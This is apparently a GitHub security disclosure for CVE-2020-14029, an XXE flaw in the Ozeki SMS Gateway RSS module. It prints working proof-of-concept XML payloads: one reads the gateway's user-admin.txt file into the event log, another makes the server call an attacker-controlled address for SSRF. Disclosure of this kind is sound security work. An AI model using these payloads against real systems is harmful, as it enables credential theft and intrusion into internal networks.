Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Disclosures/CVE-2020-14029-XXE-Ozeki SMS Gateway/
Disclosures/CVE-2020-14029-XXE-Ozeki SMS Gateway/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 
 
 

CVE-2020-14029: Ozeki SMS Gateway Insecure XML Parsing in the "RSS" Module

In the Ozeki SMS Gateway software, versions 4.17.6 and below, the RSS module processes XML files in an unsafe manner, which opens the application to XML External Entity attacks.
This vulnerability can be leveraged to:

  • Read files directly via verbose error in Event Logs
  • Server Side Request Forgery (SSRF) attacks
  • Exfiltrating files remotely via Out of Band (OOB) attacks

Requirements:

This vulnerability requires:

  • Access to an Ozeki Web Application administration interface with rights to create/modify "RSS" feeds.

Proof Of Concept:

Inline XXE

This vulnerability can be used to reflect the content of arbitrary files in the "Event" window via a "Invalid Time Format" error:
First, we point the URL to a HTTP server controlled by the attacker (Ex. 192.168.243.128):

Upon the victim's request, the attacker's server will serve the following malicious XML content:

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY ext SYSTEM "C:\Program Files (x86)\Ozeki\OzekiNG - SMS Gateway\Config\user-admin.txt">
]>
<rss xmlns:media="https://github.com/DrunkenShells" version="2.0">
<channel>
<generator>NFE/5.0</generator>
<title>Top CVEs - DrunkenShells Disclosures</title>
<link>https://github.com/DrunkenShells/Disclosures</link>
<language>en-US</language>
<webMaster>Mal</webMaster>
<copyright>2020 Mal Inc.</copyright>
<lastBuildDate>Tue, 02 Jun 2021 20:24:34 GMT</lastBuildDate>
<description>CVE News</description>
<item>
<title>XXE in Ozeki SMS Gateway</title>
<link>https://github.com/DrunkenShells/Disclosures</link>
<guid isPermaLink="false">52780825896929</guid>
<pubDate>&ext;</pubDate>
<description>Mal</description>
<source url="https://cve.mitre.org/">Mitre</source>
</item>
</channel>
</rss>

We can see the request made by the server:

And, in this case the "user-admin.txt" file gets reflected in the event log:

Server Side Request Forgery (SSRF)

Another way to use this XXE is to trigger a SSRF, in this case by making a controlled HTTP GET request when the XML is parsed.
We will be using the same steps as above, but the XML is replaced with the following:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY callhome SYSTEM "http://192.168.243.128:8000/hehehehe">
]
>
<foo>&callhome;</foo>

Now, every time the XML is parsed, a second HTTP request to "http://192.168.243.128:8000/hehehehe", will be triggered.